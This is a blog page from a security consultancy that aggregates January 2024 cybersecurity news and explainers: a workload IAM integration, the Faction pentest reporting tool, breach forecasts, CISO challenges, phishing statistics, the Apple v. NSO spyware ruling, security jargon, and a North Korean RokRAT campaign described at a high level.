InfoSec tools | InfoSec services | InfoSec books | Follow our blog | DISC llc is listed on The vCISO Directory
Jan 30 2024
Aembit Announces New Workload IAM Integration With CrowdStrike To Help Enterprises Secure Workload-To-Workload Access
Aembit Becomes the First Workload IAM Platform to Integrate with the Industry-Leading CrowdStrike Falcon Platform to Drive Workload Conditional Access
Aembit, the Workload Identity and Access Management (IAM) platform that enables DevOps and security teams to discover, manage, enforce and audit access between workloads, today announced the availability of a new integration with the industry-leading CrowdStrike Falcon® platform to give enterprises the ability to dynamically manage and enforce conditional access policies based on the real-time security posture of their applications and services.
This integration signifies a significant leap in Aembit’s mission to empower organizations to apply Zero Trust principles to make workload-to-workload access more secure and manageable.
Workload IAM transforms enterprise security by securing workload-to-workload access through policy-driven, identity-based, and secretless access controls, moving away from the legacy unmanaged, secrets-based approach.
Through this partnership, the Aembit Workload IAM solution checks to see if a CrowdStrike Falcon agent is running on the workload and evaluates its real-time security posture to drive workload access decisions to applications and data.
With this approach, now enterprises can protect their workloads from unauthorized access, even against the backdrop of changing conditions and dynamic access requirements. Additional customer benefits from this partnership include:
- Managed Workload-to-Workload Access: Enforce and manage workload access to other applications, SaaS services, and third-party APIs based on identity and policy set by the security team, driving down risk.
- Seamless Deployment: Drive consolidation by effortlessly integrating the Aembit Workload IAM Platform with the Falcon platform in a few clicks, providing a unified experience for managing workload identities while understanding workload security posture.
- Zero Trust Security Model: Embrace a Zero Trust approach, ensuring that every access request, regardless of the source, is verified before granting access rights. Aembit’s solution enforces the principle of least privilege based on identity, policy, and workload security posture, minimizing potential security vulnerabilities.
- Visibility and Monitoring: Gain extensive visibility into workload identities and access permissions, enabling swift detection and response to potential security threats. Monitor and audit access logs based on identity for comprehensive security oversight.
This industry-first collaboration builds on the recent CrowdStrike Falcon Fund strategic investment in Aembit, underscoring the global cybersecurity leader’s commitment to fostering innovation within the space. The investment reflects the recognition of the growing demands for securing workload access.
InfoSec tools | InfoSec services | InfoSec books | Follow our blog | DISC llc is listed on The vCISO Directory
Jan 30 2024
Faction: Open-source pentesting report generation and collaboration framework
Josh Summitt, the creator of Faction, has always disliked the process of writing reports, preferring to focus on uncovering bugs. A key frustration for him was the redundant step of using a separate note-taking app for storing screenshots and findings before compiling the final report.
He envisioned an integrated solution where the report generation tool would serve as the note-taking platform, incorporating all the standard templates typically used in reports. He hopes Faction will help others save time, reduce stress, and improve their information security workflow.
“I built Faction to be extendable in ways like you would extend BurpSuite. It’s designed to be flexible and extended to fit seamlessly in any environment. It is easy for internal teams to build and support their small modules versus a large code base. In addition, I hope the project will get a growing list of prebuilt modules developed by the community to expand capabilities without requiring internal development,” Summitt told Help Net Security.
Faction features
With Faction, you can:
- Streamline penetration testing and security assessment reporting through automation.
- Facilitate peer review and monitor modifications in reports.
- Design docx templates for various assessments and follow-up retests.
- Collaborate in real-time with assessors using the web application and extensions for Burp Suite.
- Utilize adaptable vulnerability templates featuring 75 pre-filled options.
- Oversee assessment teams and monitor organizational progress.
- Monitor the remediation of vulnerabilities with tailored SLA warnings and notifications.
- Leverage a comprehensive Rest API for seamless integration with other tools.
Other features:
- LDAP, OAuth 2.0 and SMTP Integration.
- Extendable with Custom Plugins similar to Burp Extender.
- Custom Report Variables.
Future plans
The developer is currently working on enhancing the extendability of Faction by introducing a full app store, reminiscent of those found in platforms like Slack and Burp. This expansion will allow for the inclusion of additional features such as custom UI elements.
“Faction has had a strong focus on penetration testing from an application security mindset. I want to expand that to be more Red and Blue Team inclusive. Not that it won’t work for these teams out of the box but it could be more flexible,” Summitt added.
Faction is available for free on GitHub.
More open-source tools to consider:
- Adalanche: Open-source Active Directory ACL visualizer, explorer
- AuthLogParser: Open-source tool for analyzing Linux authentication logs
- DriveFS Sleuth: Open-source tool for investigating Google Drive File Stream’s disk forensic artifacts
- Subdominator: Open-source tool for detecting subdomain takeovers
- EMBA: Open-source security analyzer for embedded devices
- Nemesis: Open-source offensive data enrichment and analytic pipeline
- SessionProbe: Open-source multi-threaded pentesting tool
- Mosint: Open-source automated email OSINT tool
- Vigil: Open-source LLM security scanner
- AWS Kill Switch: Open-source incident response tool
- PolarDNS: Open-source DNS server tailored for security evaluations
- k0smotron: Open-source Kubernetes cluster management
- Kubescape 3.0 elevates open-source Kubernetes security
- Logging Made Easy: Free log management solution from CISA
- GOAD: Vulnerable Active Directory environment for practicing attack techniques
- Wazuh: Free and open-source XDR and SIEM
- Yeti: Open, distributed, threat intelligence repository
- BinDiff: Open-source comparison tool for binary files
- LLM Guard: Open-source toolkit for securing Large Language Models
- Velociraptor: Open-source digital forensics and incident response
Burp Suite Cookbook: Web application security made easy with Burp Suite
To explore Pen Testing
InfoSec tools | InfoSec services | InfoSec books | Follow our blog | DISC llc is listed on The vCISO Directory
Jan 29 2024
Cybercriminals embrace smarter strategies, less effort
2024 is shaping up to be a record-breaking year for data breaches, according to Experian. Despite 2023 being labeled as a ‘successful’ year for malicious actors, the upcoming months may bring forth developments that could further disrupt the cybersecurity landscape.
Supply chain vulnerabilities amplified
There’s no question third-party data breaches have made headlines. With increased data collection, storage, and movement, there are plenty of partners down the supply chain that could be targeted. We predict attacks on systems four, five or six degrees from the source as vendors outsource data and technology solutions who outsource to another expert and so on.
Digital transformation is expanding threat surfaces. SaaS platforms and public cloud infrastructures, are pushing the perimeter out into the internet itself—putting users at greater risk.
When trying to achieve a goal, it’s said that taking small steps can lead to big results. Hackers could apply that same rule. Instead of making drastic moves and trying to reap instant reward such as with ransomware, bad actors may manipulate or alter the tiniest bits of data to stay under the radar such as changing a currency rate or adjusting the coordinates for transportation, which can have a major impact.
It’s widely known who the major players are globally that sponsor attacks and a new country in South Asia may join the international stage with their large population of engineers and programmers. While reportedly having been in the game focusing cyberattacks regionally due to political tensions, this country may broaden their sights in the future.
Plutonium, terbium, silicon wafers — these rare earth materials that are the building blocks for today’s hardware are rapidly becoming the most sought-after resources on the planet. Any disruption to an strained supply chain could send the industry (and the economy that relies on these materials) spinning.
This presents an intriguing opportunity for threat actors seeking mass disruption or nations looking to corner markets.
“Cybercriminals are continually working smarter, not harder,” said Michael Bruemmer, VP, Global Data Breach Resolution at Experian. “They are leveraging new technologies like artificial intelligence and applying their talents in different ways to be more strategic and stay a step ahead. Organizations should not ignore even the slightest security abnormalities and be more aware of what global interests may make them a target.”
Winning from the inside
Like drug cartels, cybergangs are forming sophisticated organizations as joining like-minded actors can be incredibly advantageous. This spans globally with countries potentially helping each other to advance common goals and interests. We’ll see more hackers for trade, crews looking to expand their monopolies, and cyberwarfare alliances.
In 2024, enterprising threat actors may target more publicly traded companies to gain insights to cheat the stock market or plan their attacks and sell their stash before value nosedives. Rather than breach an organization and play in the underground with stolen data, threat actors could leverage data extraction and their talents in plain sight as everyday investors.
“Today, perpetrators can come from anywhere in the world and bring with them robust resources and expertise,” added Jim Steven, Head of Crisis and Data Response Services at Experian Global Data Breach Resolution in the United Kingdom. “There are many global crime syndicates and nation-backed operations, so companies need to invest in sophisticated prevention and response methods to protect themselves.”
Learn how to access the dark web safely and not fall victim to cybercrime
InfoSec tools | InfoSec services | InfoSec books | Follow our blog | DISC llc is listed on The vCISO Directory
Jan 26 2024
What are the Common Security Challenges CISOs Face?
Chief Information Security Officers (CISOs) hold a critical and challenging role in today’s rapidly evolving cybersecurity landscape. Here are the common security challenges CISOs face…
As organizations increasingly rely on technology to drive their operations, CISOs face complex security challenges that demand their expertise and strategic decision-making.
These challenges arise from the constant emergence of sophisticated cyber threats, the need to protect sensitive data, and the ever-evolving regulatory landscape.
The role of a CISO requires balancing proactive risk mitigation with the ability to respond swiftly to incidents and breaches.
This article will delve into the top challenges CISOs face, including protecting digital assets, managing security incidents, ensuring compliance, dealing with insider threats, and the relentless pursuit of cyber resilience.
By understanding these challenges, CISOs can develop robust cybersecurity strategies and lead their organizations toward a secure and resilient future.
Who is a CISO?
Chief Information Security Officer (CISO) is a senior executive responsible for overseeing and administering an organization’s information security plan.
A CISO’s primary responsibility is safeguarding the confidentiality, availability, and integrity of an organization’s information assets and systems.
They are accountable for creating and enforcing strategies, policies, and procedures to defend against cyber threats, protect sensitive data, and mitigate security risks.
CISOs play a crucial role in maintaining an organization’s security posture by establishing and enforcing security standards, conducting risk assessments, and implementing appropriate security controls.
They collaborate with other executives, IT teams, and stakeholders to align security initiatives with business objectives and ensure that security measures are integrated into the organization’s operations.
In addition to their technical expertise, CISOs often engage in risk management, incident response planning, security awareness training, and compliance with regulatory requirements.
They stay updated on the latest cybersecurity trends, threats, and technologies to address emerging risks and implement appropriate security measures effectively.
The role of a CISO has become increasingly important as cyber threats evolve in complexity and frequency.
CISOs are responsible for safeguarding the organization’s sensitive information, maintaining the trust of customers and stakeholders, and ensuring business continuity in the face of cybersecurity challenges.
What are all the Roles and Responsibilities of CISO?
- Developing and Implementing Information Security Strategy: The CISO is responsible for developing and implementing an overarching information security strategy aligned with the organization’s business objectives. This includes setting security goals, defining security policies and procedures, and establishing risk management frameworks.
- Leading the Security Team: The CISO manages and provides leadership to the security team, including hiring, training, and supervising security personnel. They ensure the team has the necessary skills, resources, and support to carry out their responsibilities effectively.
- Overseeing Security Operations: The CISO oversees day-to-day security operations, including incident response, vulnerability management, threat intelligence, and security monitoring. They ensure appropriate controls, technologies, and processes are in place to protect the organization’s assets.
- Risk Management: The CISO is responsible for identifying and assessing security risks to the organization’s information systems and assets. They develop and implement risk management strategies to safeguard critical data and systems, including risk mitigation, transfer, and acceptance.
- Compliance and Regulatory Requirements: The CISO ensures that the organization complies with relevant security regulations, industry standards, and legal requirements. They stay updated on emerging regulations and ensure appropriate controls and processes are in place to meet compliance obligations.
- Security Incident Response: The CISO leads the organization’s response to security incidents, including data breaches, malware attacks, and other security breaches. They establish incident response plans, coordinate efforts, and collaborate with relevant stakeholders, such as legal, PR, and law enforcement agencies.
- Security Awareness and Training: The CISO promotes a culture of security awareness throughout the organization. They develop and deliver security awareness programs and training initiatives to educate employees on security best practices and minimize human-related security risks.
- Vendor and Third-Party Risk Management: The CISO assesses and manages security risks associated with third-party vendors and partners. They establish vendor security requirements, conduct due diligence, and monitor compliance with security standards and contractual obligations.
- Security Governance and Reporting: The CISO provides regular reports and updates on the organization’s security posture to executive management, board members, and other relevant stakeholders. They ensure that security metrics and key performance indicators (KPIs) are established to measure the effectiveness of security programs.
- Incident Investigation and Forensics: In the event of security incidents, the CISO oversees the investigation and forensic analysis to identify the root cause, assess the impact, and prevent future occurrences. As required, they collaborate with internal and external resources, such as forensic experts and law enforcement agencies.
GLOBAL CISO – STRATEGY, TACTICS, & LEADERSHIP: How to Succeed in InfoSec and CyberSecurity
Security Challenges CISOs Face
CISOs face various common security challenges as they strive to protect their organizations’ digital assets and information. Perimeter 81 Guide helps CISOs to prevent their network from being at Risk. Some of the key challenges they encounter include:
- Sophisticated Cyberattacks: CISOs must defend against increasingly sophisticated cyber threats, including advanced persistent threats (APTs), ransomware attacks, social engineering, and zero-day exploits. These attacks can bypass traditional security measures and require constant vigilance and adaptive security strategies.
- Insider Threats: CISOs need to address the risks posed by insiders, including employees, contractors, or partners who have authorized access to systems and data. Insider threats can involve accidental data breaches, negligence, or malicious intent, requiring a balance between enabling productivity and implementing controls to prevent unauthorized access or data leakage.
- Compliance and Regulatory Requirements: CISOs must ensure their organizations comply with industry-specific regulations, such as GDPR, HIPAA, PCI-DSS, or SOX, and evolving privacy laws. Navigating complex compliance requirements and maintaining a robust security posture to meet these standards can be a significant challenge.
- Cloud Security: As organizations increasingly adopt cloud services and infrastructure, CISOs must address the unique security challenges associated with cloud computing. This includes securing data stored in the cloud, managing access controls, and ensuring the security of cloud service providers (CSPs) and their environments.
- Security Skills Gap: CISOs often need more skilled cybersecurity professionals. The industry’s rapid growth and evolving threat landscape have resulted in high demand for cybersecurity talent, making recruiting and retaining qualified professionals challenging.
- Third-Party Risk: Organizations rely on third-party vendors and suppliers, introducing potential security risks. CISOs must assess the security posture of third parties, establish contractual security obligations, and monitor their adherence to security standards to mitigate the risk of breaches through these external connections.
- Security Awareness and Training: Human error remains a significant factor in cybersecurity incidents. CISOs must promote a strong security culture, provide regular training and awareness programs, and educate employees about cybersecurity best practices to minimize the risk of social engineering, phishing attacks, and other user-related vulnerabilities.
- Incident Response and Recovery: CISOs must develop and test robust incident response plans to manage and recover from security incidents effectively. This involves identifying and containing breaches, conducting forensic investigations, and implementing remediation measures to minimize the impact and prevent future incidents.
- Emerging Technologies: Adopting technologies like the Internet of Things (IoT), artificial intelligence (AI), and blockchain introduces new security challenges. CISOs must understand the security implications of these technologies, assess risks, and implement appropriate controls to protect against potential vulnerabilities and attacks.
- Budget and Resource Constraints: CISOs often face budget limitations and the need to prioritize security initiatives. Balancing the allocation of resources to address immediate security needs while investing in long-term security capabilities can be a significant challenge.
The Phantom CISO: Time to step out of the shadow
What are the Security Compliance CISO Should Follow
As a Chief Information Security Officer (CISO), there are several security compliance frameworks and regulations that you should consider following, depending on the nature of your organization and its operations. Here are some of the key security compliance frameworks and regulations:
- General Data Protection Regulation (GDPR): If your organization deals with the personal data of individuals in the European Union (EU), GDPR sets requirements for the protection, processing, and transfer of personal data. It includes principles for data minimization, consent, data breach notification, and the rights of individuals.
- Payment Card Industry Data Security Standard (PCI DSS): PCI DSS applies to organizations that handle credit card information. It sets requirements for securing payment card data, including network security, encryption, access controls, and regular vulnerability assessments.
- Health Insurance Portability and Accountability Act (HIPAA): HIPAA applies to organizations in the healthcare industry that handle protected health information (PHI). It establishes requirements for the privacy and security of PHI, including access controls, encryption, risk assessments, and breach notification.
- Sarbanes-Oxley Act (SOX): SOX applies to publicly traded companies in the United States. It sets requirements for financial reporting and establishes controls and processes to ensure the accuracy and integrity of financial statements. While not solely focused on security, it includes provisions for protecting financial data.
- National Institute of Standards and Technology (NIST) Cybersecurity Framework: The NIST Cybersecurity Framework provides guidelines and best practices for managing cybersecurity risks. It covers risk assessment, security controls, incident response, and continuous monitoring.
- ISO 27001: ISO 27001 is an international standard that provides a framework for establishing, implementing, maintaining, and continually improving an information security management system (ISMS). It covers various aspects of information security, including risk management, access controls, incident management, and security awareness.
- Federal Information Security Management Act (FISMA): FISMA applies to U.S. federal agencies and sets requirements for securing federal information and systems. It mandates risk assessments, security controls, incident response planning, and continuous monitoring.
Security Challenges CISOs Face to Manage Security Team
Managing a security team as a Chief Information Security Officer (CISO) requires effective leadership, communication, and coordination. Here are some key aspects to consider when managing a security team:
- Establish Clear Roles and Responsibilities: Clearly define the roles and responsibilities of each team member to ensure everyone understands their specific duties and areas of expertise. This clarity helps streamline operations and avoid confusion.
- Set Goals and Objectives: Define strategic goals and objectives for the security team aligned with the organization’s overall security strategy. Communicate these goals to the team and regularly track progress to ensure everyone is working towards the same objectives.
- Provide Guidance and Mentorship: Offer team members guidance, mentorship, and professional development opportunities. Encourage skill development, certifications, and staying up-to-date with the latest security trends and technologies—support team members in their career growth.
- Foster Collaboration and Communication: Promote a collaborative and open communication culture within the team. Encourage knowledge sharing, cross-functional collaboration, and effective communication channels. Regular team meetings, brainstorming sessions, and updates are valuable for aligning efforts.
- Support Decision-Making: Empower team members to make decisions within their areas of responsibility. Provide guidance and support when needed, but encourage autonomy and ownership in decision-making. Foster an environment where team members feel comfortable taking calculated risks.
- Establish Incident Response Procedures: Develop clear incident response procedures and ensure the team is well-prepared to handle security incidents effectively. Conduct regular drills, tabletop exercises, and simulations to test and improve the team’s incident response capabilities.
- Stay Informed and Adapt: Stay up-to-date with the latest security threats, industry trends, and best practices. Encourage continuous learning and professional development for the team. Adapt security strategies and measures as the threat landscape evolves.
- Collaborate with Other Departments: Work closely with other departments, such as IT, legal, HR, and executive management, to ensure security initiatives are aligned with business objectives and integrated into overall organizational operations. Build relationships and foster a culture of security awareness throughout the organization.
- Regularly Evaluate and Improve: Regularly evaluate the team’s performance, processes, and procedures. Collect feedback from team members and stakeholders to identify areas for improvement. Implement changes and adjustments as necessary to enhance the team’s effectiveness and efficiency.
- Lead by Example: Demonstrate strong leadership skills, integrity, and a commitment to security best practices. Lead by example in adhering to security policies and procedures. Encourage a positive and supportive work environment.
The CISO Evolution: Business Knowledge for Cybersecurity Executives
Final Thoughts
CISOs face many common security challenges as protectors of their organization’s digital assets and information.
From sophisticated cyberattacks and insider threats to compliance requirements and resource constraints, these challenges highlight the complex and evolving nature of the cybersecurity landscape.
CISOs must navigate these challenges by adopting a proactive and strategic approach to security, leveraging advanced technologies, fostering a strong security culture, and collaborating with stakeholders.
To overcome these challenges, CISOs must stay abreast of emerging threats, continuously evaluate and improve their security measures, and prioritize investments in critical security capabilities.
They must also foster strong partnerships with internal teams, third-party vendors, and industry peers to collectively address security challenges and share best practices.
While the security challenges CISOs face may seem daunting, they also present opportunities for innovation and growth.
By effectively addressing these challenges, CISOs can enhance their organizations’ security posture, safeguard critical assets, and instill confidence in customers and stakeholders.
Ultimately, the role of a CISO requires a comprehensive and adaptable approach to cybersecurity, where staying one step ahead of threats and continuously improving security measures are paramount.
By embracing these challenges, CISOs can help shape a secure and resilient future for their organizations in an increasingly interconnected and threat-filled digital landscape.
InfoSec tools | InfoSec services | InfoSec books | Follow our blog | DISC llc is listed on The vCISO Directory
Jan 25 2024
198% Surge In Browser Based Zero-Hour Phishing Attacks
The digital landscape is under siege. Surging browser-based phishing attacks, a 198% increase in just the second half of 2023, paint a chilling picture of cyber threats outsmarting traditional security.
Menlo Security’s 2023 State of Browser Security Report unveils this alarming trend, sounding the alarm for organizations and individuals alike.
The Rise Of Evasive Attacks
Gone are the days of easily identifiable phishing scams.
Cybercriminals are now armed with highly evasive techniques, bypassing conventional defenses like network filters and email scanners.
These HEATs (Highly Evasive Adaptive Threats), making up 30% of all browser-based attacks, employ tactics like:
- SMS Phishing (Smishing): Luring victims with seemingly legitimate text messages.
- Adversary in the Middle (AITM): Intercepting and manipulating web traffic on the fly.
- Image-Based Phishing: Embedding malicious code within seemingly harmless images.
- Brand Impersonation: Mimicking trusted websites to steal login credentials.
- Multi-Factor Authentication (MFA) Bypass: Finding ways to circumvent even two-factor security.
Traditional security, built for known threats, stumbles against the lightning speed of zero-hour attacks.
These novel phishing campaigns, observed at over 11,000 in just 30 days, exploit the vast and vulnerable attack surface of modern browsers.
Worryingly, 75% of these attacks hide on trusted websites, cloaked in a veneer of legitimacy.
Despite technological advancements, the human element remains the weakest link.
Phishing preys on our inherent trust and cognitive biases, tricking us into divulging sensitive information.
This makes browser security the ultimate line of defense, protecting users at the point of interaction with the web.
Menlo Security: Shining A Light On The Dark Web
The report paints a stark picture, but not a hopeless one. Menlo Security offers a beacon of hope with its advanced browser security solutions.
Leveraging cutting-edge AI and machine learning, Menlo’s technology detects and thwarts even the most sophisticated evasive attacks.
Key Takeaways for a Safer Web:
- Evasive threats demand a new approach: Traditional security falls short. Look to advanced browser security solutions powered by AI.
- Zero-hour attacks lurk everywhere: Don’t let trusted websites lull you into a false sense of security. Remain vigilant and practice safe browsing habits.
- Your browser is the frontline: Prioritize comprehensive browser security to shield yourself from evolving cyber threats
David Miller, Policy Advocate: “This report calls for increased collaboration between cybersecurity researchers, technology companies, and policymakers. We need to share threat intelligence, develop best practices, and create regulatory frameworks that incentivize stronger browser security measures.”
Organizations should adopt efficient incident response plans, regularly monitor email traffic for anomalies, and stay updated on emerging threats to stay ahead of the evolving email threat landscape with Trustifi AI-powered Email security solutions.
Phishing Attacks and Detection
Phishing for Phools: The Economics of Manipulation and Deception
InfoSec tools | InfoSec services | InfoSec books | Follow our blog | DISC llc is listed on The vCISO Directory
Jan 25 2024
US judge rejects spyware developer NSO’s attempt to bin Apple’s spyware lawsuit
Judge says anti-hacking laws fits Pegasus case “to a T”
https://www.theregister.com/2024/01/24/us_judge_rejects_pegasus_spyware/
A US court has rejected spyware vendor NSO Group’s motion to dismiss a lawsuit filed by Apple that alleges the developer violated computer fraud and other laws by infecting customers’ iDevices with its surveillance software.
Apple sued NSO, developer of the notorious Pegasus spyware, back in November 2021 and asked the court to permanently ban NSO from using any Apple software, services, or devices. The lawsuit alleges that company violated the US Computer Fraud and Abuse Act (CFAA), California’s Unfair Competition Law, and the terms of use for Apple’s own iCloud when its spyware was installed on victims’ devices without their knowledge or consent. NSO now must answer Apple’s complaint by February 14.
Pegasus infected Apple customers’ devices via a zero-click exploit called FORCEDENTRY, according to Cupertino. Once it lands on phones, the spyware allows users to snoop on phone calls, messages, and access the phone’s camera and microphone without permission.
Despite the surveillance-software maker’s claims that it only sells to government agencies, and even then, only to investigate terrorism or other serious crimes, the software has repeatedly been used to spy on journalists, activists, political dissidents, diplomats and government officials. This has led to US sanctions against the company and several lawsuits.
Last March, NSO asked the court to toss Apple’s lawsuit, arguing that Cupertino should be required to sue the developer in Israel, its home jurisdiction. It also claimed that Apple can’t sue over CFAA violations because the iGiant itself didn’t suffer any damages or loss [PDF].
The court, in its ruling on Monday, dismissed these arguments, noting that “the anti-hacking purpose of the CFAA fits Apple’s allegations to a T, and NSO has not shown otherwise.”
“A ‘loss’ is ‘any reasonable cost to any victim, including the cost of responding to an offense, conducting a damage assessment, and restoring the data, program, system, or information to its condition prior to the offense, and any revenue lost, cost incurred, or other consequential damages incurred because of interruption of service’ … That is precisely the loss Apple has alleged here,” the judge continued [PDF].
- US Supremes deny Pegasus spyware maker’s immunity claim
- Apple sues ‘amoral 21st century mercenaries’ NSO for infecting iPhones with Pegasus spyware
- Think tank report labels NSO, Lazarus as ‘cyber mercenaries’
- Indian politicians say Apple warned them of state-sponsored attacks
When asked about the judge’s ruling, an NSO Group spokesperson said the software maker will fight on.
“The motion to dismiss is part of the legal process in this case,” the NSO spokesperson told The Register. “The technology in question is critical to law enforcement and intelligence agencies in their efforts to maintain public safety. We are confident that once the arguments are presented, the Court will rule in our favor.”
Apple, meanwhile, took the win, and a spokesperson told The Register that this lawsuit is just one of the ways the iGiant is fighting back against spyware vendors.
These include the new Lockdown Mode security feature, the threat notifications it sends to users who may be targets in nation-state attacks, and a $10 million grant to support civil society organizations that research spyware threats and conduct advocacy on the topic through the Ford Foundation.
How a Spy in Our Pocket Threatens the End of Privacy, Dignity, and Democracy
Global Spyware Scandal: Exposing Pegasus
Pegasus Spyware – ‘A Privacy Killer’
CyberWar, CyberTerror, CyberCrime and CyberActivism
InfoSec tools | InfoSec services | InfoSec books | Follow our blog | DISC llc is listed on The vCISO Directory
Jan 24 2024
SYSTEM HACKING, SCRIPTING, AND OTHER CONTRONYMS IN CYBERSECURITY
The cybersecurity field continuously generates new terms and concepts as it evolves with time. It also repurposes words to describe new concepts. There’s a never-ending flow of jargon that some refer to as an alphabet soup of complexity. From NGAV to XDR, it appears unlikely for cybersecurity to run out of new acronyms and terminologies.
Meanwhile, some popular terms used in cybersecurity can have contradicting meanings. These are the so-called contronyms, which may add some spice to the insipidity of tech terms. Here’s a list of some famous cybersecurity words or phrases many would probably think they are already familiar with but are likely to be surprised to learn about their other meanings.
HACKING
Most people tend to equate hacking to cybercrime, an attempt to illegally access, damage, or take over a computer system. This is not surprising given that most news articles that mention hacking use the term in its negative connotation, referring to cyber attacks aimed at bypassing access controls or security measures to prevent the unauthorized use of IT resources.
However, hacking can mean something positive or useful. In cybersecurity, system hacking can refer to an authorized effort to break existing security measures to test their effectiveness and spot weaknesses. The term often used for this action is “ethical hacking,” but hacking by itself is neither good nor bad. It’s how it is used that spells the difference.
Hacking in both its malicious and ethical instances follows the same stages. Also, they use similar techniques, from password cracking to phishing, the deployment of rootkits and trojans, exploitation of buffer overflows, privilege escalation, and the use of keyloggers. These steps and techniques are observed in attempts to exploit vulnerabilities and detect security weaknesses so that they can be plugged or resolved.
PATCHING
In contrast to hacking, patching is often perceived as a positive term. It is mostly known as the application of a software patch to address a vulnerability or add new functions. Software publishers regularly release patches for their software in response to developments in the cyber threat landscape and to provide improvements in their software products.
Negatively, patching refers to the unauthorized modification of a software or system by taking advantage of system vulnerabilities. Cybercriminals can infiltrate or corrupt software pipelines, allowing them to send out malicious software patches to unsuspecting users. This works because many tend to excessively trust their automated software pipelines or they carelessly obtain their software updates from unofficial sources.
SNIFFING
Among those involved in network administration, sniffing is a legitimate process that entails the tracking and analysis of network traffic. This is done to undertake a troubleshooting task, monitor network performance, or facilitate network security-related actions. It is one of the vital actions in Intrusion Detection Systems (IDS).
However, sniffing can also refer to malicious packet sniffing, wherein an attacker intercepts the packets transmitted through a network. Sniffing allows bad actors to steal login credentials and other sensitive information. It can help them gain access to online accounts or steal crucial data. Sniffing is often used as a form of cyber attack on devices that connect to the internet through public WiFi networks.
Sniffing in the negative context is not new. It has been used as an attack for decades. Cybersecurity advocates pointed out the threat of sniffing more than a decade ago amid the proliferation of businesses that offer free public WiFi connection without strong security.
SCRIPTING
Scripting refers to the writing and deployment of scripts for the automation of repetitive tasks. It is used to automate routine actions, which enables the efficient management of systems. Scripting is also employed in penetration testing to simulate cyber attacks on a system. Similarly, it is used in log analysis and monitoring, day-to-day security operations, forensics and incident response, and cross-platform compatibility testing.
However, scripting can also be malicious, as used by threat actors. Cybercriminals can turn to malicious scripting to automate the execution of files that have been successfully introduced into a system. Successfully deceiving a computer user into downloading a file is not enough for the malicious file to inflict damage. Scripts are necessary to unleash the effects of malicious files and detect security vulnerabilities.
BACKDOOR
The term backdoor is usually known for its negative implication. Most news and articles refer to backdoors in an unfavorable context. This should not come as a surprise since backdoors are often used by cybercriminals. They serve as a way to bypass normal authentication for any computer-related system, facilitating unauthorized access or the introduction of malicious files to a computer or network.
However, backdoors can be a feature intentionally added to the software. They can be deliberately put in an app to provide an optional means of access in cases when conventional access methods are unavailable. This “necessary” version of a backdoor was in the spotlight some years ago when the US FBI asked Apple to purposely build a backdoor on their iPhones.
KILL CHAIN
The cyber kill chain is a framework developed by Lockheed Martin as part of its patented Intelligence Driven Defense model for cyber attack identification and prevention. It consists of a series of steps that represent the different stages of a cyber attack, from early reconnaissance to command and control and “actions on objectives.” This model helps organizations visualize and comprehend the different stages of an attack, focusing on critical points in the attack, developing strategies to mitigate threats, and boosting incident response capabilities.
Essentially, the kill chain is a process that is supposed to help organizations prepare for cyber attacks, successfully fend off an assault, and mitigate problems that emerge in the wake of a cyber attack. However, the phrase kill chain, in colloquial use, may refer to a successful cyber attack.
AN EXERCISE IN CYBERSECURITY JARGON COMPLEXITY
It may sound confusing, but contronyms exist everywhere. Interestingly, these words still make sense despite the auto-contradiction. In cybersecurity, contronyms reflect the complexity and flexibility of language, showing how words can change in meaning depending on their context and usage.
Isn’t it counterintuitive for cybersecurity terms to bear contradicting meanings? Possibly. However, what is ultimately important is the understanding that cybersecurity terms are far from straightforward. It is a must to properly get acquainted with them to understand what they really mean, especially with the rise of a plethora of acronyms and jargon introduced by security solution providers. Many of which tend to be marketing-speak or misnomers.
InfoSec tools | InfoSec services | InfoSec books | Follow our blog | DISC llc is listed on The vCISO Directory
Jan 23 2024
North Korean Weaponize Fake Research
North Korean Hackers Weaponize Fake Research to Deliver RokRAT Backdoor
Media organizations and high-profile experts in North Korean affairs have been at the receiving end of a new campaign orchestrated by a threat actor known as ScarCruft in December 2023.
“ScarCruft has been experimenting with new infection chains, including the use of a technical threat research report as a decoy, likely targeting consumers of threat intelligence like cybersecurity professionals,” SentinelOne researchers Aleksandar Milenkoski and Tom Hegel said in a report shared with The Hacker News.
The North Korea-linked adversary, also known by the name APT37, InkySquid, RedEyes, Ricochet Chollima, and Ruby Sleet, is assessed to be part of the Ministry of State Security (MSS), placing it apart from Lazarus Group and Kimsuky, which are elements within the Reconnaissance General Bureau (RGB).
Earlier this week, North Korean state media reported that the country had carried out a test of its “underwater nuclear weapons system” in response to drills by the U.S., South Korea, and Japan, describing the exercises as a threat to its national security.
The latest attack chain observed by SentinelOne targeted an expert in North Korean affairs by posing as a member of the North Korea Research Institute, urging the recipient to open a ZIP archive file containing presentation materials.
While seven of the nine files in the archive are benign, two of them are malicious Windows shortcut (LNK) files, mirroring a multi-stage infection sequence previously disclosed by Check Point in May 2023 to distribute the RokRAT backdoor.
There is evidence to suggest that some of the individuals who were targeted around December 13, 2023, were also previously singled out a month prior on November 16, 2023.
SentinelOne said its investigation also uncovered malware – two LNK files (“inteligence.lnk” and “news.lnk”) as well as shellcode variants delivering RokRAT – that’s said to be part of the threat actor’s planning and testing processes.
While the former shortcut file just opens the legitimate Notepad application, the shellcode executed via news.lnk paves the way for the deployment of RokRAT, although this infection procedure is yet to be observed in the wild, indicating its likely use for future campaigns.
Both LNK files have been observed deploying the same decoy document, a legitimate threat intelligence report about the Kimsuky threat group published by South Korean cybersecurity company Genians in late October 2023, in a move that implies an attempt to expand its target list.
This has raised the possibility that the adversary could be looking to gather information that could help it refine its operational playbook and also target or mimic cybersecurity professionals to infiltrate specific targets via brand impersonation techniques.
The development is a sign that the nation-state hacking crew is actively tweaking its modus operandi in an apparent effort to circumvent detection in response to public disclosure about its tactics and techniques.
“ScarCruft remains committed to acquiring strategic intelligence and possibly intends to gain insights into non-public cyber threat intelligence and defense strategies,” the researchers said.
“This enables the adversary to gain a better understanding of how the international community perceives developments in North Korea, thereby contributing to North Korea’s decision-making processes.”
source: https://thehackernews.com/2024/01/north-korean-hackers-weaponize-fake.html
The Hacker and the State: Cyber Attacks and the New Normal of Geopolitics
InfoSec tools | InfoSec services | InfoSec books | Follow our blog | DISC llc is listed on The vCISO Directory
Jan 22 2024
AI AND SECURITY: ARE THEY AIDING EACH OTHER OR CREATING MORE ISSUES? EXPLORING THE COMPLEX RELATIONSHIP IN TECHNOLOGY
Artificial Intelligence (AI) has arisen as a wildly disruptive technology across many industries. As AI models continue to improve, more industries are sure to be disrupted and affected. One industry that is already feeling the effects of AI is digital security. The use of this new technology has opened up new avenues of protecting data, but it has also caused some concerns about its ethicality and effectiveness when compared with what we will refer to as traditional or established security practices.
